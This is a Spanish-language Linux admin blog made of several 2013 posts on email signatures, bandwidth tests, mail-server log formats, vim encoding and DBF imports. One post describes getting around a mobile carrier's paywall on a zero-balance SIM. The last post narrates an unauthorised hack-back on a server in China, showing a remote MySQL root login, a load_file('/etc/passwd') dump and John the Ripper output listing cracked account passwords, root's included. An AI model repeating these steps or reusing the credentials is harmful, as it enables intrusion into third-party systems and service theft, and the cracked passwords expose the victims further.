jueves, 30 de mayo de 2013

Crear firma html para cliente de correo "Thunderbird"

Para crear una firma "decente" o por lo menos que se vea razonablemente bien en Thunderbird. Lo podemos hacer de diferentes maneras, una de ellas es hacerlo desde un archivo html, y es lo que les vengo a comentar en este post.

Creamos un archivo .html  con el siguiente contenido  > "Modificalo a tu gusto"


<br><img src="file:///home/villatux/.thunderbird/uach.png" alt="Logo UACH" ALIGN="left">
<b>UNIVERSIDAD AUTÓNOMA DE CHIHUAHUA</b><br>
Oswaldo Villa<br>
Administración de Servidores<br><br>
<b>Departamento de Servicios Electrónicos e Internet</b><br>
CGTI    Tel. 439-1817<br>

Ya cuando tenemos nuestro archivo lo configuramos en Thunderbird siguiendo estos pasos:

* Seleccionar el menú Herramienta->Configuración de las cuentas
* Seleccionar la cuenta de correo en la columna de izquierda
* Marcar la casilla Adjuntar la firma de un archivo y clic en Elegir
* Buscar el fichero firma.html que hemos creado previamente y clic en Abrir
* Clic en Aceptar
* Redactar un mensaje de prueba para comprobar que la firma está como tu deseas.

Se vería algo como esto en tu firma:


viernes, 24 de mayo de 2013

SpeedTest desde terminal (Monitoreo de transferencia > bandwith)




Nload es una aplicación de consola que monitorea el ancho de banda usado en tiempo real. Visualiza el trafico entrante y saliente usando dos gráficas separadas y provee un poco más información al respecto, como el total transferido, promedio de transferencia, mínimo y máximo de transferencia.





Curl (Speedtest por archivo):
Con curl puedes monitorear tu ancho de banda descargando un archivo desde otro servidor.

Para monitorizar el ancho de banda de subida de tu servidor, puedes ejecutar este mismo comando y descargando un archivo de tu servidor para ver el ancho de banda que está manejando en ese momento.




Si deseas hacerlo con algún archivo de los servidores que se dedican a hacer estos test , puedes hacerlo con este :

curl -o /dev/null http://speedtest.wdc01.softlayer.com/downloads/test500.zip

UPDATE!

Otra forma de hacer el speedtest  es con lftp  y ahora si podemos hacer el test de download y upload:

Download
lftp -e 'pget http://speedtest.wdc01.softlayer.com/downloads/test500.zip; exit; '

Upload
lftp -u usuario ftp.ejemplo.com.mx -e 'put miarchivo.iso; bye'





jueves, 23 de mayo de 2013

Sun Java System Messaging Server (Logs entry Format)

25.3.1 Understanding the MTA Log Entry Format

The MTA log file is written as ASCII text. By default, each log file entry contains eight or nine fields as shown in the example below.
16-Feb-2007 14:54:13.72 tcp_local ims-ms EE 1 adam@sesta.com rfc822;marlowe@siroe.com marlowe@ims-ms-daemon
The log entry shows:
  1. The date and time the entry was made (in the example, 16-Feb-2007 14:54:13.72).
  2. The channel name for the source channel (in the example, tcp_local).
  3. The channel name for the destination channel (in the example, ims-ms). (For SMTP channels, when LOG_CONNECTION is enabled, a plus (+) indicates inbound to the SMTP server; a minus (-) indicates outbound via the SMTP client.)
  4. The type of entry (in the example, EE). Entries can consist of a single action code (see Table 25–2) or an action code and one or more modifier codes (see Table 25–3). The format for entries is as follows:

    For example a logging entry code of EEC means that the email was Enqueued (action-code E) using ESMTP (modifier E) and SMTP Chunking (modifier C). Please refer to the tables below for details on the currently used action and modifier codes.
  5. The size of the message (in the example, 1). This is expressed in kilobytes by default, although this default can be changed by using the BLOCK_SIZE keyword in the MTA option file. The SMS channel can be configured to log a page count rather than file size in this field. See LOG_PAGE_COUNT.
  6. The envelope From: address (in the example, adam@sesta.com). Note that for messages with an empty envelope From: address, such as notification messages, this field is blank.
  7. The original form of the envelope To: address (in the example, marlowe@siroe.com).
  8. The active (current) form of the envelope To: address (in the example, marlowe@ims-ms-daemon).
  9. The delivery status (SMTP channels only).
The following three tables describe the logging entry codes.
Table 25–2 Logging Entry Action Codes
Entry
Description
B
Bad command sent to the SMTP server. The recipient address field will contain the command that was rejected while the diagnostic field will contain the response the SMTP server gave. MTA channel option, MAX_B_ENTRIES, controls how many bad commands will be logged in a given session. Default is 10.
D
Successful dequeue
E
Enqueue
J
Rejection of attempted enqueue (rejection by slave channel program)
K
Recipient message rejected. If the sender requests NOTIFY=NEVER DSN flag set or if the message times out or if the message is manually returned (for example: imsimta qm “delete” command always generates a “K” record for each recipient, while a qm “return” command will generate a “K” record rather than an “R” record). This indicates that there was no notification sent to the sender per the sender’s own request.
This can be compared with “R” records, which are the same sort of rejection/time-out, but where a new notification message (back to the original sender) is also generated regarding this failed message.
Q
Temporary failure to dequeue
R
Recipient address rejected on attempted dequeue (rejection by master channel program), or generation of a failure/bounce message
V
Warning message that will appear whenever a transaction is abnormally aborted. There will be one "V" record per enqueued recipient address.
W
Warning message sent to notify original sender that the message has not been delivered yet, but it is still in the queue being retried.
Z
Some successful recipients, but this recipient was temporarily unsuccessful; the original message file of all recipients was dequeued, and in its place a new message file for this and other unsuccessful recipients will be immediately enqueued

The following table describes the logging entry modifier codes.
Table 25–3 Logging Entry Modifier Codes
Entry
Description
A
SASL authentication used.
C
Chunking was used. Note that ESMTP has to be used for chunking to work, so you'll typically see field values like EEC or DEC.
E
An EHLO command was issued/accepted and therefore ESMTP was used.
L
LMTP was used.
S
TLS/SSL used. S transaction log entries now increment the various submitted message counters associated with the channel.

If LOG_CONNECTION is enabled (see Option File Format and Available Options in Sun Java System Messaging Server 6.3 Administration Reference), then an additional set of action codes will be used. These are described below.
Table 25–4 SMTP Channel's LOG_CONNECTION Action Codes + or - Entries
Entry
Description
C
Connection closed. A diagnostic field will follow. Written to connection.log_current (or mail.log_current if a single log file is being used). Used to record the reason why the connection was closed. In particular, if the connection was closed due to some session disconnect limit being reached, that fact will show up in the diagnostics field.
O
Connection opened
U
Logs SMTP authentication successes and failures. Format is the same as other O and C entries. In particular, the same application and transport information fields appear in same order. The username will be logged in the username field if it is known. Bit 7 (value 128) of the LOG_CONNECTION MTA option controls this.
X
Connection rejected
Y
Connection attempt failed before being established
I
ETRN command received

With LOG_CONNECTION, LOG_FILENAME, LOG_MESSAGE_ID, LOG_NOTARY, LOG_PROCESS, and LOG_USERNAME all enabled in the MTA Option file, the format becomes as shown in the example below. (The sample log entry line has been wrapped for typographic reasons; the actual log entry would appear on one physical line.)

16-Feb-2007 15:04:01.14 2bbe.5.3 tcp_local ims-ms
EE 1 service@siroe.com rfc822;adam@sesta.com
adam@ims-ms-daemon 20 /opt/SUNWmsgsr/data/queue/ims-ms/000/ZZf0r2i0HIaY1.01
<0jdj00803faon200 mailstore.siroe.com=""> mailsrv
siroe.com (siroe.com [192.160.253.66])
Where the additional fields, beyond those already discussed above, are:
  1. The process ID (expressed in hexadecimal), followed by a period (dot) character and a count. If this had been a multithreaded channel entry (that is, a tcp_* channel entry), there would also be a thread ID present between the process ID and the count. In the example, the process ID is 2bbe.5.3.
  2. The NOTARY (delivery receipt request) flags for the message, expressed as an integer (in the example, 20).
  3. The file name in the MTA queue area (in the example, /opt/SUNWmsgsr/data/queue/ims-ms/000/ZZf0r2i0HIaY1.01).
  4. The message ID (in the example, <0jdj00803faon200 mailstore.siroe.com="">).
  5. The name of the executing process (in the example, mailsrv). On UNIX, for dispatcher processes such as the SMTP server, this will usually be mailsrv (unless SASL was used, in which case it will be the authenticated user name, for example, *service@siroe.com).
  6. The connection information (in the example, siroe.com (siroe.com [192.160.253.66]). The connection information consists of the sending system or channel name, such as the name presented by the sending system on the HELO/EHLO line (for incoming SMTP messages), or the enqueuing channel's official host name (for other sorts of channels). In the case of TCP/IP channels, the sending system's real name, that is, the symbolic name as reported by a DNS reverse lookup and/or the IP address, can also be reported within parentheses as controlled by the ident* channel keywords; see 12.4.3.4 IDENT Lookups for an instance of the default identnone keyword, that selects display of both the name found from the DNS and IP address.

lunes, 13 de mayo de 2013

Internet gratis!! con Telcel y Movistar (con banda ancha USB)

La configuración aquí mostrada fué realizada en Ubuntu-Linux 13.04 , pero debe funcionar en cualquier distro linux.


NOTA:  
* Necesitas poner un chip que no tenga saldo para la conexión
* Si tu USB viene con un chip , cámbialo por uno de cualquier celular, para que no te gaste el saldo que tienes, o si no tienes saldo pues úsala xDD

ASEGURARNOS QUE DETECTA BIÉN LA USB



* La insertamos y esperamos a que la detecte la computadora.  lo sabemos al dar clic en las redes inalambricas por que dirá :"Banda ancha movil"
* Damos clic ahi para seguir los pasos que nos indica:
  - Lugar
  - Compañia de telefonía celular

COMPROBAR
Ya que la detecta correctamente podemos probar, al abrir nuestro navegador web (en mi caso Firefox)  y buscar cualquier pagina ej. www.google.com.mx  esto nos redireccionará a una pagina en donde nos dice que no tenemos saldo para navegar en internet y que paguemos para hacerlo :p



REGISTARNOS EN

https://www.hotsplots.de/en/register.html



 Despues de registrarnos y confirmar el correo que nos llegó a la bandeja de entrada de nuestro correo, podemos ingresar a la pagina con nuestra cuenta:


Ya cuando estemos logeados con nuestra cuenta,  podemos ingresar al siguiente enlace :

https://www.hotsplots.de/en/my-hotsplots/my-userdata/openvpn-key.html

de donde descargaremos los archivos necesarios para conectarnos a la vpn gratuita con nuestra cuenta que acabamos de crear. (Bbajamos la version para UNIX/Linux):


REALIZAR LA CONEXIÓN A LA VPN DESDE TERMINAL

Abrimos la terminal de sistema y nos situamos en el directorio donde descargamos el archivo .tar como superusuario:

villatux#cd /home/villatux/

Descomprimimos:

villatux#tar -xvf openvpn_key.tar

 Nos situamos en el directorio de las configuraciones de la VPN:

villatux#cd openvpn_key

Instalamos openvpn si es que no lo tenemos :


villatux# apt-get install openvpn

Ejecutamos openvpn para que lea las configuraciones que descargamos:

 villatux# openvpn hotsplots.conf

y veremos algo como esto:

 villatux# openvpn hotsplots.conf
Mon May 13 17:33:40 2013 OpenVPN 2.2.1 x86_64-linux-gnu [SSL] [LZO2] [EPOLL] [PKCS11] [eurephia] [MH] [PF_INET6] [IPv6 payload 20110424-2 (2.2RC2)] built on Feb 13 2013
Mon May 13 17:33:40 2013 IMPORTANT: OpenVPN's default port number is now 1194, based on an official port number assignment by IANA.  OpenVPN 2.0-beta16 and earlier used 5000 as the default port.
Mon May 13 17:33:40 2013 NOTE: OpenVPN 2.1 requires '--script-security 2' or higher to call user-defined scripts or executables
Mon May 13 17:33:40 2013 Control Channel MTU parms [ L:1545 D:138 EF:38 EB:0 ET:0 EL:0 ]
Mon May 13 17:33:40 2013 RESOLVE: NOTE: vpn.hotsplots.net resolves to 5 addresses
Mon May 13 17:33:40 2013 Data Channel MTU parms [ L:1545 D:1300 EF:45 EB:4 ET:0 EL:0 ]
Mon May 13 17:33:40 2013 Fragmentation MTU parms [ L:1545 D:1300 EF:45 EB:4 ET:0 EL:0 ]
Mon May 13 17:33:40 2013 Local Options hash (VER=V4): '35ec189c'
Mon May 13 17:33:40 2013 Expected Remote Options hash (VER=V4): '9b1c411c'
Mon May 13 17:33:40 2013 UDPv4 link local (bound): [undef]
Mon May 13 17:33:40 2013 UDPv4 link remote: [AF_INET]46.228.204.146:1194
Mon May 13 17:33:41 2013 VERIFY OK: depth=1, /C=DE/ST=Berlin/L=Berlin/O=hotsplots_GmbH/OU=certificate_authority/CN=www.hotsplots.de/emailAddress=ca@hotsplots.de
Mon May 13 17:33:41 2013 VERIFY OK: nsCertType=SERVER
Mon May 13 17:33:41 2013 VERIFY OK: depth=0, /C=DE/O=hotsplots_GmbH/OU=Gateway_Server/CN=VPN1
Mon May 13 17:33:44 2013 Data Channel Encrypt: Cipher 'BF-CBC' initialized with 128 bit key
Mon May 13 17:33:44 2013 Data Channel Encrypt: Using 160 bit message hash 'SHA1' for HMAC authentication
Mon May 13 17:33:44 2013 Data Channel Decrypt: Cipher 'BF-CBC' initialized with 128 bit key
Mon May 13 17:33:44 2013 Data Channel Decrypt: Using 160 bit message hash 'SHA1' for HMAC authentication
Mon May 13 17:33:44 2013 Control Channel: TLSv1, cipher TLSv1/SSLv3 DHE-RSA-AES256-SHA, 1024 bit RSA
Mon May 13 17:33:44 2013 [VPN1] Peer Connection Initiated with [AF_INET]46.228.204.146:1194
Mon May 13 17:33:46 2013 TUN/TAP device tun0 opened
Mon May 13 17:33:46 2013 do_ifconfig, tt->ipv6=0, tt->did_ifconfig_ipv6_setup=0
Mon May 13 17:33:46 2013 /sbin/ifconfig tun0 10.44.40.194 pointopoint 10.44.40.193 mtu 1500
Mon May 13 17:33:46 2013 Initialization Sequence Completed


Hasta donde dice  " Initialization Sequence Completed"  nos indica que la conexión fué realizada con éxito.  y ahora a navegar , que para eso es el internet xDD

viernes, 10 de mayo de 2013

Cambiar codificación de ficheros con VI > VIM

Una vez que el archivo se encuentra abierto con VIM y suponiendo que el archivo esta codificado con iso-8859-1 (latin1) se debe teclear en el modo comandos la siguiente línea.

    :set fenc=utf-8

Si el archivo esta codificado con utf-8 y se desea pasar a iso-8859-1 se debe escribir la siguiente línea.

    :set fenc=iso-8859-1


Nota: No deben existir espacios entre fenc, el igual y el tipo de codificación que se utilizará.


Este comando solo permitirá cambiar la codificación del archivo que se encuentra abierto, sin embargo puede ser necesario editar la codificación de varios archivos para lo cual se puede ejecutar el siguiente comando en la consola de linux.

    find -name '*.php' -exec vim {} '+set fenc=utf-8' '+x' \;

find -name '*.php' permite buscar uno o más archivos dentro del directorio y de los directorios que se encuentran en su interior que coinciden con el parámetro de búsqueda.
-exec permite ejecutar un comando sobre los archivos que son encontrados.
vim {} '+set fenc=utf-8' permite cambiar la codificación de los archivos que coinciden con la búsqueda realizada.

lunes, 6 de mayo de 2013

Importar Archivos .DBF a MySQL con dbf2mysql

Recientemente me interesé en consultar algunos datos de algunas personas por X motivos, el problema es que estos datos estaban en una base de datos de FoxPro  .DBF  y ya estaba integrada a un software para windows. Esto no es para mi nada grato ya que no tengo windows instalado en mis computadoras. 

Para poder ver mis datos hice la importación a mysql y con ello hacer sencillas consultas SQL o también hacer una interfaz web para las consultas.

En esta ocasión utilicé el software "dbf2mysql" disponible en la lista de repositorios de ubuntu, y lo instalas super sencillo:

1) Instalar dbf2mysql:

sudo apt-get install dbf2mysql


Las banderas más importantes de dbf2mysql són los siguientes:

    -h indica el servidor a donde conectarse
    -U usuario MySQL
    -P password MySQL
    -d base de datos donde se insertaran los datos
    -t tabla donde se insertarán los datos
    -c crea la tabla si no existe
    -cc crea la tabla, pero no inserta registros
    -f traduce los nombres de campo a minúsculas
    -n no se agrega ‘NOT NULL’ en las sentencias de creación de tabla
    -o exporta solo los campos listados (Ej. -o field1,field2…)
    -s substituye permite cambiar nombres de campos (Ej. -s oldName1=newName1,oldName1=newName1)
    -i lista de campos a indexar. Genera UN indice por campo (Ej. -i field1,field2…)
    -r quita espacios antes y después de datos alfanuméricos
    -v muestra detalles de la conversión
    -vv muestra más detalles
    -vvv incluye informe de progreso

ya teniendo instalado el programa, y sabiendo como se utiliza manos a la obra:

2) Creo una base de datos MySQL vacia:

mysql -u [DBUSER] -p -e "CREATE DATABASE `[DBNAME]`"

3) Por último lanzamos el siguiente comando para indicarle que importe el archivo dbf a la base de datos local, en la tabla [DBTABLE] de la base de datos [DBNAME], entrando con el usuario [DBUSER] y el password [DBPASS]. Mediante el flag -c forzamos a que cree la tabla si no existe y con -f le indicamos que traduzca los nombres de los campos a minusculas:

dbf2mysql -h localhost -U [DBUSER] -P [DBPASS] -d [DBNAME] -t [DBTABLE] -c -f /home/villatux/miarchivo.dbf

Esta importación no tendra en cuenta algunos atributos importantes de la tabla como, por ejemplo, los campos autoincrementales.

Si tenemos algun problema de este tipo, es recomendable crear la estructura de la tabla antes de realizar la importación.

viernes, 3 de mayo de 2013

De victima a verdugo (de atacado a atacante xDD)

La semana pasada revisando las bitácoras de mi servidor encontré que desde hace al menos 2 meses (lo digo por que no guardo más de dos meses de bitácoras) están tratando de acceder a mi servidor por ssh con bruteforce. Confieso que esto me alertó un poco y por lo cual me dedique esa tarde exclusivamente a investigar el hecho.

Empecé a hacer análisis básicos de puertos con nmap, y luego sabiendo los puertos que tenia abiertos, me puse a probar algunos exploits que iban dirigidos a ellos. Con este análisis saqué la deducción de los sistemas que manejaba el servidor , como lo son un servidor web, la ubicación es en China, servicios de base de datos Oracle y algunos detalles, dentro de los cuales estaba abierto el puerto default de MySQL

Al segundo día (que tuve tiempo por el trabajo y la escuela) obtube acceso a MySQL del servidor. 

Ya en el servidor solo me bastó ejecutar algunos comandos de mysql para obtener los passwords encriptados del servidor para empezar a crackearlo.

Aquí la odisea (ya cuando obtuve acceso por MySQL):

villatux# mysql -h 58.248.3X.XXX -u root -p
Enter password: 
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 16817
Server version: 5.0.22-standard

Copyright (c) 2000, 2013, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> pager cat
PAGER set to 'cat'
mysql> select load_file('/etc/passwd');

root:x:0:0:root:/root:/bin/bash
roo:x:0:0::/tmp:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
avahi:x:70:70:Avahi daemon:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
avahi-autoipd:x:100:101:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
oprofile:x:16:16:Special user account to be used by OProfile:/home/oprofile:/sbin/nologin
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
gdm:x:42:42::/var/gdm:/sbin/nologin
sabayon:x:86:86:Sabayon user:/home/sabayon:/sbin/nologin
oracledb:x:593:594::/home/wasadmin:/bin/bash
bpcard:x:501:500:bpcard:/home/bpcard:/bin/ksh
bpposp:x:502:500:bpposp:/home/bpposp:/bin/ksh
ccbfca:x:503:501:ccbfca:/home/ccbfca:/bin/ksh
ccbcomm:x:504:501:ccbcomm:/home/ccbcomm:/bin/ksh
informix:x:505:505:informix:/home/informix:/bin/ksh
oracle:x:506:514:oracle:/home/db/oracle:/bin/ksh
svnroot:x:507:507::/home/svnroot:/bin/bash
exchange:x:508:500::/home/exchange:/bin/ksh
bonus:x:509:509::/home/bonus:/bin/ksh
topbpas:x:510:508::/home/topbpas:/bin/ksh
fcs:x:511:511::/home/fcs:/bin/ksh
wasadmin:x:515:516::/home/wasadmin:/bin/bash
weblogic:x:516:517::/home/weblogic:/bin/bash
icf:x:517:518::/home/icf:/bin/bash
comm:x:518:519::/home/comm:/bin/bash
topbpastrans:x:519:508::/home/topbpas/topbpastrans:/bin/ksh
topbpasrules:x:520:521::/home/topbpas/topbpasrules:/bin/ksh
topbpasbatch:x:521:522::/home/topbpas/topbpasbatch:/bin/ksh
zhangsan:x:523:514::/home/zhangsan:/bin/bash
bashtest:x:524:525::/home/bashtest:/bin/ksh
db2inst1:x:533:534::/home/db2inst1:/bin/ksh
db2fenc1:x:534:535::/home/db2fenc1:/bin/ksh
emall:x:535:534::/home/emall:/bin/ksh
bppospb:x:536:536::/home/bppospb:/bin/ksh
cmcenter:x:537:534::/home/cmcenter:/bin/bash
dora:x:538:538::/home/dora:/bin/bash
mysql:x:101:104:MySQL server:/var/lib/mysql:/bin/bash
intern01:x:539:540::/home/intern01:/bin/bash
intern02:x:540:541::/home/intern02:/bin/bash
intern03:x:541:542::/home/intern03:/bin/bash
intern04:x:542:543::/home/intern04:/bin/bash
intern05:x:543:544::/home/intern05:/bin/bash
intern06:x:544:545::/home/intern06:/bin/bash
intern07:x:545:546::/home/intern07:/bin/bash
intern08:x:546:547::/home/intern08:/bin/bash
intern09:x:547:548::/home/intern09:/bin/bash
intern10:x:548:549::/home/intern10:/bin/bash
intern11:x:549:550::/home/intern11:/bin/bash
intern12:x:550:551::/home/intern12:/bin/bash
intern13:x:551:552::/home/intern13:/bin/bash
intern14:x:552:553::/home/intern14:/bin/bash
intern15:x:553:554::/home/intern15:/bin/bash
intern16:x:554:555::/home/intern16:/bin/bash
intern17:x:555:556::/home/intern17:/bin/bash
intern18:x:556:557::/home/intern18:/bin/bash
intern19:x:557:558::/home/intern19:/bin/bash
intern20:x:558:559::/home/intern20:/bin/bash
intern21:x:559:560::/home/intern21:/bin/bash
posp:x:560:561::/home/posp:/bin/ksh
batch:x:561:562::/home/batch:/bin/bash
trans:x:562:562::/home/trans:/bin/bash
rules:x:563:562::/home/rules:/bin/bash
htclient:x:564:564::/home/htclient:/bin/bash
train:x:565:565::/home/train:/bin/bash
tra:x:0:565::/home/train:/bin/bash
test_informix:x:566:505::/home/test_informix:/bin/ksh
traininguser:x:567:567::/home/traininguser:/bin/bash
ncup:x:568:568::/home/ncup:/bin/bash
topbpasprd:x:569:569::/home/topbpasprd:/bin/bash
jiraroot:x:570:570::/home/jiraroot:/bin/bash
mysqluser:x:571:571::/home/mysqluser:/bin/bash
db2inst2:x:572:572::/home/db2inst2:/bin/bash
payment:x:575:575::/home/payment:/bin/bash
dispute:x:577:577::/home/dispute:/bin/bash
nacp:x:578:578::/home/nacp:/bin/bash
cmcenter2:x:579:579::/home/cmcenter2:/bin/bash
cmcente2:x:580:580::/home/cmcente2:/bin/bash
wendeson:x:582:582::/home/wendeson:/bin/bash
malldb:x:583:583::/home/malldb:/bin/bash
toppay:x:584:584::/home/toppay:/bin/bash
portal:x:0:585::/home/portal:/bin/bash
tomcat:x:585:586::/home/tomcat:/bin/bash
efront:x:586:587::/home/efront:/bin/bash
ics:x:587:588::/home/ics:/bin/bash
hsmsoft:x:588:589::/home/hsmsoft:/bin/bash
dps:x:589:590::/home/dps:/bin/bash
tasskms:x:590:591::/home/tasskms:/bin/bash
topcbbs:x:591:592::/home/topcbbs:/bin/bash
showhow:x:592:593::/home/showhow:/bin/bash
+---------------------------------------------------+
1 row in set (0.56 sec)

mysql> quit
Bye
villatux#


Luego me copie el resultado del SELECT a mi maquina local y con esto empezar a destripar xDD:

villatux#john /home/villatux/shadow 
Warning: only loading hashes of type "md5", but also saw type "des"
Use the "--format=des" option to force loading hashes of that type instead
Loaded 74 password hashes with 74 different salts (FreeBSD MD5 [32/64 X2])
Remaining 38 password hashes with 38 different salts
test_informix    (test_informix)
emall            (emall)
traininguser     (traininguser)
icf              (icf)
topbpasrules     (topbpasrules)
zhangsan         (zhangsan)
topbpasbatch     (topbpasbatch)
fcs              (fcs)
dps              (dps)
trans            (trans)
hsmsoft          (hsmsoft)
htclient         (htclient)
posp             (posp)
tasskms          (tasskms)
malldb           (malldb)
efront           (efront)
showhow          (showhow)
topbpastrans     (topbpastrans)
wendeson         (wendeson)
ncup123          (ncup)
jiraroot123      (jiraroot)
svnroot123       (svnroot)
ccbfca123        (ccbfca)
ccbcomm123       (ccbcomm)
mysqluser123     (mysqluser)
wasadmin123      (wasadmin)
ics123           (ics)
topbpras123       (topbpas)
123456           (dispute)
123456           (payment)
123456           (cmcenter)
123456           (cmcente2)
123456           (toppay)
123456           (nacp)
123456           (cmcenter2)
1qaz2wsx         (portal)
huatengscube123456789  (root)


Y tantan xDD
Con esto me copié algunos juguetes de los “Hackers” :

* Scripts para enviar spam (enviaban de los tipo xxx@domain.co.uk)
* Scripts para escaneo mundial de ips
* Scripts para mass defacing
* Software *NIX modificado (RootKit)
* y Algunas técnicas de espionaje interesantes hehe

Después de esto no ha cambiado nada, solo me aseguro de no sufrir intentos de acceso en mi servidor,  aplicando algunas medidas para ello y el servidor aqui mostrado no ha sufrido algún cambio.